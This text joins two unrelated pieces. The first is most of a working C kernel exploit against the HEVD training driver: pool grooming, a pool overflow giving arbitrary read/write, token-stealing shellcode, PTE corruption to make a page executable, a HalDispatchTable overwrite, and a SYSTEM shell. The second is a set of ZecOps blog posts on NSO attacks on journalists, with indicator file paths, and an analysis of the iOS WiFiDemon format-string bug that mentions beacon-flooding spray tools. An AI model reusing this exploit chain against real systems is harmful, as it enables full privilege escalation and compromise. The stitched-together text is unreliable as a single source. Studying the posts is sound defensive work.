        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i <= 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i <= 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Increase the counter
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

ZecOps Blog
Threat Actors are Working Together. Defenders Should Collaborate Too!ZecOps Research Team
17 July 2021 at 20:14

Threat Actors are Working Together. Defenders Should Collaborate Too!

ZecOps Blog

By: ZecOps Research Team

17 July 2021 at 20:14

Threat Actors are Working Together. Defenders Should Collaborate Too!

We previously published that we suspected that there were more than one threat actor targeting the Al-Jazeera journalists.

Background

ZecOps discovered NSO attacks that targeted Al-Jazeera automatically using ZecOps Mobile EDR & DFIR solutions. Our initial analysis suggested that the footprint does not belong only to NSO.

ZecOps Mobile Threat Intelligence Brief

ZecOps can now confirm, with high-confidence, that the attacks targeting journalists in Middle East were caused by at least two commercial threat actors working together, and the attack launched by a nation-state that purchased NSO’s exploit-platform.

This may sound like a minor detail, but every detail in attribution is crucial.

In the last transparency report by NSO, they published that they limit the usage.

This can be translated into “We have a license based attack-as-a-service model. We only sell a certain amount of attack licenses to a certain buyer.”. While this intelligence is not fully confirmed, and should be taken with a grain of salt, our intelligence also suggests that “Desert Cobra” (state actor) purchased an ‘unlimited number of licenses’ package to carry out attacks using NSO’s software.

NSO acquired exploits from another supplier and leveraged the borrowed exploit in the attack launched by the end-buyer (Desert Cobrat) against Al-Jazeera journalists. It is unclear if the end-customer, a government, was aware that parts of the exploit chain were obtained from another threat-actor and sold as a package.

Bottom line

As threat actors working together, defenders should be working together too. We hope that the vendors reading this will enable SOCs around the world with better access in-order to find and capture payloads by threat actors like NSO, that will always find a way, or as we can see in this post “buy their way”, to bypass all the existing mitigations and security controls.

ZecOps Mobile EDR Customers: no further action is required. ZecOps discovered the Al-Jazeera attack, and other NSO related incidents automatically. The deployed systems detect these activities. The complete report and full IOC list is available in ZecOps Mobile Threat Intelligence feed.

Al Jazeera NSO Attack IOCs:

/private/var/tmp/uevkjdwxijvah/c
/private/var/db/com.apple.xpc.roleaccountd.staging/launchafd
/private/var/db/com.apple.xpc.roleaccountd.staging/rs
/private/var/db/com.apple.xpc.roleaccountd.staging/natgd

Unfortunately, due to iOS sandbox restrictions, it is not trivial to check for these IOCs. If you would like to check your phone for these IOCs, other attacks by NSO, or other threat actors, please feel free to contact us here.

Free Mobile Inspection

To help discover these attacks, for a limited time, ZecOps is offering free mobile inspections to businesses that were targeted in the NSO leak. For your instant inspection, fill out the form below.

First name:

Last name:

Title:

Company:

Business email:

Phone number:

Comments (Optional):

We got your request.

Please make sure that you have filled in all the fields.

ZecOps Blog
Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently PatchedZecOps Research Team
17 July 2021 at 13:30

Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

ZecOps Blog

By: ZecOps Research Team

17 July 2021 at 13:30

Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

The TL;DR Version:

ZecOps Mobile EDR Research team investigated if the recently announced WiFi format-string bug in wifid was exploited in the wild.

This research led us to interesting discoveries:

Recently a silently patched 0-click WiFi proximity vulnerability on iOS 14 – iOS 14.4 without any assigned CVE
That the publicly announced WiFi Denial of Service (DoS) bug, which is currently a 0day, is more than just a DoS and actually a RCE!
Analysis if any of the two bugs were exploited across our cloud user-base.

Introduction

There’s a new WiFi vulnerability in-town. You probably already saw it, but didn’t realize the implication. The recently disclosed ‘non-dangerous’ WiFi bug – is potent.

This vulnerability allows an attacker to infect a phone/tablet without *any* interaction with an attacker. This type of attack is known as “0-click” (or “zero-click”). The vulnerability was only partially patched.

1. Prerequisites to the WiFiDemon 0-Click Attack:

Requires the WiFi to be open with Auto-Join (enabled by default)
Vulnerable iOS Version for 0-click: Since iOS 14.0
The 0-Click vulnerability was patched on iOS 14.4

Solutions:

Update to the latest version, 14.6 at the time of writing to avoid risk of WiFiDemon in its 0-click form.
Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.

2. Prerequisites to the WiFi 0Day Format Strings Attack:

Unlike initial research publications, at the time of writing, the WiFi Format Strings seem to be a Remote Code Execution (RCE) when joining a malicious SSID.

Solutions:

Do not join unknown WiFis.
Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.
This vulnerability is still a 0day at the time of writing, July 4th. iOS 14.6 is VULNERABLE when connecting to a specially crafted SSID.
Wait for an official update by Apple and apply it as soon as possible.

Wi-Fi-Demon ?

wifid is a system daemon that handles protocol associated with WIFI connection. Wifid runs as root. Most of the handling functions are defined in the CoreWiFi framework, and these services are not accessible from within the sandbox. wifid is a sensitive daemon that may lead to whole system compromise.

Lately, researcher Carl Schou (@vm_call) discovered that wifid has a format string problem when handling SSID.

https://www.forbes.com/sites/kateoflahertyuk/2021/06/20/new-iphone-bug-breaks-your-wifi-heres-the-fix

The original tweet suggests that this wifid bug could permanently disable iPhone’s WiFi functionality, as well as the Hotspot feature. This “WiFi” Denial of Service (DoS) is happening since wifid writes known wifi SSID into the following three files on the disk:

/var/preferences/com.apple.wifi.known-networks.plist
/var/preferences/SystemConfiguration/com.apple.wifi-networks.plist.backup
/var/preferences/SystemConfiguration/com.apple.wifi-private-mac-networks.plist

Every time that wifid respawns, it reads the bad SSID from a file and crashes again. Even a reboot cannot fix this issue.

However, this bug can be “fixed” by taking the following steps according to Forbes:

“The fix is simple: Simply reset your network settings by going to Settings > General > Reset > Reset Network Settings.”

This bug currently affects the latest iOS 14.6, and Apple has not yet released any fixes for this bug.

Further Analysis Claims: This is Only a Denial of Service

Followed by another researcher Zhi @CodeColorist published a quick analysis.

https://blog.chichou.me/2021/06/20/quick-analysis-wifid/

His conclusion was:

“For the exploitability, it doesn’t echo and the rest of the parameters don’t seem like to be controllable. Thus I don’t think this case is exploitable.
After all, to trigger this bug, you need to connect to that WiFi, where the SSID is visible to the victim. A phishing Wi-Fi portal page might as well be more effective.”

The Plot Thickens

We checked ZecOps Mobile Threat Intelligence to see if this bug was exploited in the past. We noticed that two of our EMEA users had an event related to this bug. Noteworthy, we only have access to our cloud data, and couldn’t check other on-premises clients – so we might be missing other events.

We asked ourselves:

Why would a person aware of dangerous threats connect to a network with such an odd name “%s%s…”. – Unlikely.
Why would an attacker bring a tactical team to target a VIP, only to cause DoS – It still does not make sense.

Remotely exploitable, 0-click, under the hood!

Further analysis revealed that:

Attackers did not need to force the user to connect. This vulnerability could be launched as a 0click, without any user interaction. A victim only needed to have your WiFi turned on to trigger the vulnerable code.
This is not a DoS, but an actual RCE vulnerability for both the recently patched 0-click format-strings vulnerability, and the malicious SSID format-strings 0-day vulnerability.

This 0-click bug was patched on iOS 14.4 and credits “an anonymous researcher” for assisting. Although this is a potent 0-click bug, a CVE was not assigned.

Technical Details: Analysis of a Zero-Click WiFi Vulnerability – WiFiDemon

Let’s do a deeper dive into the technical details behind this vulnerability:

Considering the possible impact of triggering this vulnerability as a 0-click, as well as the potential RCE implications, we investigated the wifid vulnerability in depth.

When we tested this format-strings bug on an older version, similar to our clients, we noticed that wifid has intriguing logs when it is not connected to any wifi.

These logs contain SSID, which indicates that it may be affected by the same format string bug.

We tested it and Voilà, it is affected by the same format string bug – meaning that this is a zero-click vulnerability and can be triggered without an end-user connecting to a strange named wifi.

This log is related to a common smart device behavior: Automatically scan and join known networks.

Zero-Click – Even When The Screen is Off

The iPhone scans WiFi to join every ~3 seconds while the user is actively using the phone. Furthermore, even if the user’s phone screen has been turned off, it still scans for WiFi but at a relatively lower frequency. The waiting time for the following scan will be longer and longer, from ~10 seconds to 1+ minute.

As long as the WiFi is turned on this vulnerability can be triggered. If the user is connected to an existing WiFi network, an attacker can launch another attack to disconnect/de-associate the device and then launch this 0-click attack. Disconnecting a device from a WiFi is well-documented and we’ll not cover it as part of the scope for this blog.

This 0-click vulnerability is powerful: if the malicious access point has password protection and the user never joins the wifi, nothing will be saved to the disk. After turning off the malicious access point, the user’s WIFI function will be normal. A user could hardly notice if they have been attacked.

Exploiting this Vulnerability

We further analyzed whether this vulnerability can be exploited, and how:

This post assumes that the reader is aware of the concept of format-string bugs and how to exploit them. However, this bug is slightly different from the “traditional” printf format string bugs because it uses [NSString stringWithFormat:] which was implemented by Apple, and Apple removed the support for %n for security reasons. That’s how an attacker would have been able to write to the memory in an exploitation of a traditional format string bug.

Where You AT? – %@ Is Handy!

Since we cannot use %n, we looked for another way to exploit this 0-click N-Day, as well as the 1-click 0-day wifid bug. Another possible use is %@, which is uniquely used by Objective-C.

Since the SSID length is limited to 32 bytes, we can only put up to 16 Escape characters in a single SSID. Then the Escape characters we placed will process the corresponding data on the stack.

A potential exploit opportunity is if we can find an object that has been released on the stack, in that case, we can find a spray method to control the content of that memory and then use %@ to treat it as an Objective-C object, like a typical Use-After-Free that could lead to code execution.

Step 1: Find Possible Spraying Opportunities on the Stack

First, we need to design an automatic method to detect whether it is possible to tweak the data on the stack. lldb breakpoint handling script perfectly fits that purpose. Set a breakpoint right before the format string bug and link to a lldb script that will automatically scan and observe changes in the stack.

Step 2: Find an Efficient Spraying Method

Then we need a spray method that can interfere with wifid’s memory over the air.

An interesting strategy is called Beacon Flooding Attack. It broadcasts countless Beacon frames and results in many access points appearing on the victim’s device.

To perform a beacon flooding attack, you need a wireless Dongle that costs around $10 and a Linux VM. Install the corresponding dongle firmware and a tool called mdk3. For details, please refer to this article.
